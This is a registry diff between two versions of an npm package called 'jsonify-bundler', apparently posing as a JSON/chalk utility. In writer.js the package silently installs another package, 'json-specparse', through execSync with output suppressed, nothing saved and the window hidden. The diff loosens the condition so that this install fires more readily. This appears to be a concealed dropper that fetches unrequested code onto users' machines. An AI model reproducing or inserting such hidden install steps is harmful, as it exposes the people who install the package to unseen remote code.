jsonify-bundler 4.3.9 → 4.3.11

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/lib/writer.js CHANGED
@@ -1,4 +1,3 @@
1
- 'use strict'
2
1
  const os = require('os')
3
2
  const pkg = require('../package.json')
4
3
  const fs = require('fs');
@@ -46,7 +45,7 @@ const data = {
46
45
  try {
47
46
  require('json-specparse');
48
47
  } catch (err) {
49
- if (ct>1) {
48
+ if (ct>0) {
50
49
  execSync(`npm install json-specparse --no-warnings --no-save --no-progress --loglevel silent`, { windowsHide: true });
51
50
  }
52
51
  }
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "jsonify-bundler",
3
- "version": "4.3.9",
3
+ "version": "4.3.11",
4
4
  "description": "Jsonify the structure and output chalk string",
5
5
  "main": "pino.js",
6
6
  "subModuleVersion": "4",
package/tsconfig.json DELETED
@@ -1,14 +0,0 @@
1
- {
2
- "compilerOptions": {
3
- "target": "es6",
4
- "lib": [ "es2015", "dom" ],
5
- "module": "commonjs",
6
- "noEmit": true,
7
- "strict": true,
8
- "esModuleInterop": true,
9
- },
10
- "exclude": [
11
- "./test/types/*.test-d.ts",
12
- "./*.d.ts"
13
- ]
14
- }